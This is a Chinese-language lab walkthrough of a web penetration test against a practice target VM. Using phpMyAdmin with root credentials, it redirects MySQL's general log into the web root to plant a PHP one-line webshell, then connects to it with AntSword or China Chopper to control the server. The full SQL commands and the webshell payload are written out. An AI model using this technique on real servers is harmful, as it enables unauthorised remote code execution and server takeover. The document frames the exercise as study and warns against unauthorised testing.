Web站点渗透测试
我们需要准备靶机和攻击机,开启靶机让它成为服务器,然后用攻击机的chrome浏览器输入靶机ip进入网站
攻击机
进入渗透测试的实验后,点击工具,打开虚拟机,待其右下角显示电脑的标志表示启动成功。
靶机
然后在攻击机中,打开靶机的ip进入网站
利用御剑扫描目录 ,找到PhpMyAdmin
进入之后,输入密码与账户root
点击sql,输入以下语句,
SHOW VARIABLES LIKE 'general%'
我们需要打开当前的日志功能,即general_log是off状态。
输入
set global general_log = "ON";
开启日志功能
然后在sql写入一句话木马
select ‘<?php @eval($_POST[1]);?>’
然后查看御剑扫描的结果,找到info.php路径打开网页后如下图,圈起来的部分为绝对路径
然后在sql语句那里执行
set global general_log_file=' C://xxx//xxx//xxx//shell.php';
把三个xxx换成上图中的红框圈出来的绝对路径
这时就会把日志文件的存储路径改为站点根目录下的shell.php文件。之后就可以在浏览器中访问了
之后可以用蚁剑或者菜刀软件来连接创建的shell.php文件,输入此网页的网址,密码就是一句话木马中的中括号的1,
如果出错,就说明一句话木马写错了,要注意@前面的空格。
完成后就可以控制服务器了。
这次的网络渗透操作有些复杂,我们利用渗透测试来模拟黑客攻击web应用程序的安全性过程。目的是发现应用程序中的潜在漏洞,以便后续修复,防止黑客利用这些漏洞恶意攻击。
此次测试只是为了学习研究,web渗透测试必须要遵循法律法规和道德规范,不得未经授权擅自对其他系统进行测试。